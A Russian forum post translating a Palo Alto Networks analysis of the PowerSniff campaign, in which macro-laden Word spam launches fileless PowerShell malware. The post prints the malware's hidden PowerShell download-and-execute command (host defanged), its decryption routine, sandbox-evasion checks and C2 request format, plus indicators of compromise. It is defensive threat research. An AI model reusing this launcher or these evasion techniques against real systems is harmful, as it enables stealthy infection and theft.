Вредоносное ПО PowerSniff атакует, используя макросы и PowerShell

Тема в разделе "Новости информационной безопасности", создана пользователем Dragokas, 18 мар 2016.

  1. Dragokas
    Оффлайн

    Dragokas Very kind Developer Команда форума Супер-Модератор Разработчик Клуб переводчиков

    Сообщения:
    4.497
    Симпатии:
    4.312
    Введение

    Концепция бесфайловой техники атаки не нова. Семейство, подобное вредоносу Poweliks, который злоупотребляет Microsoft Powershell, появилось в последние годы и обратило к себе особое внимание из-за способности скомпрометировать систему, практически не оставляя следов своего присутствия при проверке с использованием обычных криминалистических методов.

    Системные администраторы хвалят мощь и универсальность PowerShell, начиная с версии 2.0, интегрированной в Windows 7. К сожалению, вместе с универсальностью появляется и возможность для злоупотребления, в частности способность проводить запись напрямую в память ОС.

    Как правило, бесфайловые вредоносные программы наблюдаются в составе набора эксплойтов, таких как Angler. Palo Alto Networks наблюдали за недавней кампанией рассылки спама, несущей высокий риск, в котором используются вредоносные макросы в документах для выполнения скрипта PowerShell. Он внедряется напрямую в память подобно семейству Ursnif.


    Заражение

    Первые жертвы получили электронное письмо, подобное как на картинке ниже:

    powersniff1.png

    Изображение 1. Подправленное письмо, содержащее вредоносный документ Word.

    На момент написания статьи, Palo Alto Networks зафиксировали порядка 1500 писем с различными именами файлов. Большинство из писем содержало характерную информацию о компании жертвы, например, телефонный номер, физический адрес, а также имя лица. Такая информация обычно не включалась в широко распространенные спам-рассылки и весьма часто может обеспечить чувство доверия у жертвы, что в свою очередь может привести к увеличению количества успешно открытых вложений.

    Следующие примеры названий тем сообщений были замечены в ходе данной кампании:

    [имя], Пожалуйста, подтвердите [что-то] в подарочной карте в [позиция].
    [имя], Пожалуйста, подтвердите это [имя] подарочного ваучера.
    [имя], Пожалуйста, закройте это неоплаченное обязательство № [номер]
    [имя], Забронировано новое [место]
    [имя], Пожалуйста, закройте этот неоплаченный баланс по [номер]
    [имя], Пожалуйста, примите решение по этому упущенному платежу [номер]

    При этом, похоже, что США больше всего подвержены этой угрозе, как показано на карте AutoFocus ниже:

    powersniff2.png
    Изображение 2. Отображение AutoFocus попыток заражений, основываясь на географическом положении.


    Хотя ни одна из отраслей не была конкретной мишенью этой рассылки, похоже, что письма чаще всего приходили в организации из профессиональной отрасли, медицинских учреждений и обрабатывающей промышленности.

    powersniff3.png
    Изображение 3. Отображение AutoFocus попыток заражений, основываясь на отрасли.


    Вредоносное вложение.

    Как только жертва откроет вредоносный документ, вложенный в письмо, она встретится с вредоносным макросом, который содержится в файле. В следующем примере демонстрируется макрос, который будет запущен при открытии документа. В зависимости от настроек безопасности Microsoft Word-а, жертве может потребоваться вручную запустить макрос.

    powersniff4.png
    Изображение 4. Вредоносный макрос, внедренный в документ Microsoft Word.

    Этот макрос задействует сервис WMI для порождения скрытого процесса powershell.exe со следующими аргументами: (URL были урезаны для безопасности):

    Код (PowerShell):

    powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('http://rabbitons[.]pw/cache') | iex } else {(new-object Net.WebClient).DownloadString('http://rabbitons[.]pw/css') | iex}
     
    Читатели могли заметить оператор if/else, который проверяет размер типа IntPtr. На 32-разрядной ОС Windows его размер будет составлять 4 байта, а на 64-разрядной – 8. Такая специфическая проверка является быстрым способом для атакующего узнать разрядность системы. В случае запуска на 32-битной ОС, они загружают и выполняют файл, расположенный по адресу ‘/cache’, иначе - ‘/css’.


    Функциональная часть

    Скачанный файл является скриптом PowerShell, который содержит шелкод. В свою очередь он декодируется и выполняется, как показано на рисунке:

    powersniff5.png
    Изображение 5. Пэйлоадер PowerShell, загруженный вредоносным ПО.

    Как только этот шелкод запустится, он декодируется и выполняет встроенную в него полезную нагрузку. Она начинается с дешифровки нескольких строк, используя следующий алгоритм, продемонстрированный на языке Python

    Код (Python):

    def decrypt(data, seed):
      out = ""
      for d in data:
          byte = (ord(d)^seed) & 0xFF
          out += chr(byte)
          seed = (0x19660D * seed + 0x3C6EF35F) & 0xFFFFFFFF
      return out
     
    (Прим. переводчика – алгоритм наподобие ксора).

    Для данного образца (SHA256: 74ec24b5d08266d86c59718a4a476cfa5d220b7b3c8cc594d4b9efc03e8bee0d) сид инициализируется со значением 0xDDBC9D5B. После дешифровки строк пейлоадер выполняет несколько действий, чтобы определить, запущен ли он в виртуализированном окружении либо в песочнице.

    Образец ищет следующие имена пользователей:

    - MALTEST
    - TEQUILABOOMBOOM
    - SANDBOX
    - VIRUS
    - MALWARE

    Пейлоадер также проверяет присутствие таких библиотек:

    - sbiedll.dll
    - dbghelp.dll
    - api_log.dll
    - dir_watch.dll
    - pstorec.dll
    - vmERROR.dll
    - wpespy.dll
    - PrxDrvPE.dll
    - PrxDrvPE64.dll

    и другие простые проверки, например, вызов функции IsDebuggerPresent().

    Дальше он проводит небольшую разведку путем выполнения команды ‘ipconfig /all’ и проверки результатов.

    Вредонос специально проверяет отсутствие этих строк:

    - school
    - hospital
    - colledge
    - health
    - NURSE

    Если они не найдены, он продолжает проверять закешированные адреса URL на машине жертвы согласно этому списку:

    - Citrix
    - XenApp
    - dana-na

    Если была найдена любая из этих строк или из небольшого списка сайтов финансовых учреждений, то машина жертвы считается интересной для атакующего и будет помечена типом ‘666’ в http-запросе. Дополнительно вредонос запросит вывод команды ‘net view’ и проверит отсутствие таких строк:

    - TEACHER
    - STUDENT
    - SCHOOLBOARD
    - PEDIATRICS
    - ORTHOPED

    Он также проверит наличие следующих строк:

    - POS
    - STORE
    - SHOP
    - SALE

    Если эти условия выполнены, машина жертвы помечает маркером '666'. Если ни одно из условий не выполнено, пейлодер пометит машину жертвы типом '555'.

    По существу этих проверок можно сделать вывод, что вредоносное ПО пытается активно избежать заражения систем, принадлежащих образовательным и медицинским учреждениям, а конечной целью являются магазины и организации, проводящие финансовые транзакции. Похожие техники были замечены во вредоносном ПО семейства ‘Ursnif’ в середине 2015 года.

    После проведенной разведки вредоносная программа отправляет HTTP GET запрос к одному из заранее прописанных командных серверов, используя следующий формат:

    Код (Text):

    /yuppi/?user=%08x%08x%08x%08x&id=%u&ver=%u&os=%lu&os2=%lu&host=%u&k=%lu&type=%u
     
    Переменная 'type' содержит значение '555' или ‘666’, о котором было рассказано ранее. ‘id’ и ‘ver’ жестко вшиты. Этот конкретный образец использовал значения 24 и 123 соответственно. Параметр ‘k’ используется как сид дешифровки в запросе к C2 серверу. После этого сервер возвращает зашифрованную DLL. Эту DLL можно расшифровать, использую тот же алгоритм шифрования, что мы обсудили ранее. DLL временно записывается на диск по пути:

    Код (Text):

    %%userprofile%%\\AppData\\LocalLow\\[random].db
     
    После этого она исполняется при помощи вызова из-под rundll32.exe. Экспортированная функция 'Register' используется при загрузке вредоносной DLL.

    Во время этого анализа ни один из командных серверов не отвечал на запросы.

    Заключение и благодарности

    Эта широко распространенная спам-рассылка была замечена на прошлой неделе. В связи с целенаправленной информацией о жертвах, размещенной внутри спам писем, а также использованием резидентных вредоносных программ, этой конкретной кампании необходимо присвоить степень высокого риска. Поскольку вредоносное ПО использует макросы в документах Microsoft Word, пользователи должны убедиться, что макросы не включены по умолчанию, а также быть осторожными при запуске любых макросов, полученных через ненадежные источники.

    Пользователи программы WildFire от Palo Alto Networks защищены от этой угрозы, т.к. все соответствующие файлы были должным образом отмечены как вредоносные. Дополнительно, все вовлеченные домены командных серверов были помечены вредоносными. Пользователи программы AutoFocus могут идентифицировать данный зловред с помощью тэга PowerSniff.

    Исследователям хочется поблагодарить сертифицированного специалиста @maciekkotowicz за его замечательный анализ конфигурационных данных вредоносного ПО.

    Индикаторы компрометации

    Хеши SHA256

    a8663becc17e34f85d828f53029ab110f92f635c3dfd94132e5ac87e2f0cdfc3
    30cd5d32bc3c046cfc584cb8521f5589c4d86a4241d1a9ae6c8e9172aa58ac73
    0661c68e6c247cd6f638dbcac7914c826a5feee1013e456af2f1f6fd642f4147
    f204c10af7cdcc0b57e77b2e521b4b0ac04667ccffce478cb4c3b8b8f18e32a2
    7e22ea4e06b8fd6698d224ce04b3ef5f00838543cb96fb234e4a8c84bb5fa7b3
    f45bf212c43d1d30cc00f64b3dcae5c35d4a85cacd9350646f7918a30af1b709
    1e746ba37c56f7f2422e6e01aa6fde6f019214a1e12475fe54ee5c2cf1b9f083
    340f82a198aa510159989058f3f62861de74135666c50060491144b7b3ec5a6f
    815bd46e66f1d330ed49c6f4a4e570da2ec89bcd665cedf025028a94d7b0cc1e
    a1770a7671679f13601e75a7cb841fea90c7add78436a0bea875ce50b92afc33
    83e305724e9cd020b8f80535c5dd897b2057cee7d2bb48461614a37941e78e3a
    74ec24b5d08266d86c59718a4a476cfa5d220b7b3c8cc594d4b9efc03e8bee0d
    90a7951683a5a77a21d4a544b76e2e6ee04e357d2f5bfcff01cd6924906adf77
    2c21dafcb4f50cae47d0d4314810226cba3ee4e61811f5c778353c8eac9ba7dc
    247511ab6d7d3820b9d345bb899a7827ce62c9dd27c538c75a73f5beba6c6018
    708374a4dfaaa8e44ee217ca5946511cacec55da5eabb0feb1df321753258782
    136379754edd05c20d5162aed7e10774a95657f69d4f9a5de17a8059c9018aa6
    5d215ef3affe320efe4f5034513697675de40ba8878ca82e80b07ad1b8d61ed8

    Командные и управляющие сервера

    supratimewest[.]com
    letterinklandoix[.]net
    supratimewest[.]biz
    starwoodhotels[.]pw
    oklinjgreirestacks[.]biz
    starwoodhotels[.]pw
    brookmensoklinherz[.]org


    Перевод подготовлен: Dragokas
    Источник: Palo Alto Networks

    При перепубликации ссылка на данную тему обязательна.
     
    Последнее редактирование: 20 мар 2016
    Kиpилл, SNS-amigo и iskander-k нравится это.
  2. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.222
    Симпатии:
    8.904
    Продолжение:

    Мошенники используют скрипты Windows PowerShell для загрузки исполняемого файла Loziak из URL Google Docs. А Loziak является идеальным инструментом для сбора информации и отправки на сервер мошенников.

    Windows PowerShell and Google Docs Abused to Spread Laziok Trojan
     
    Kиpилл, Охотник и Dragokas нравится это.

Поделиться этой страницей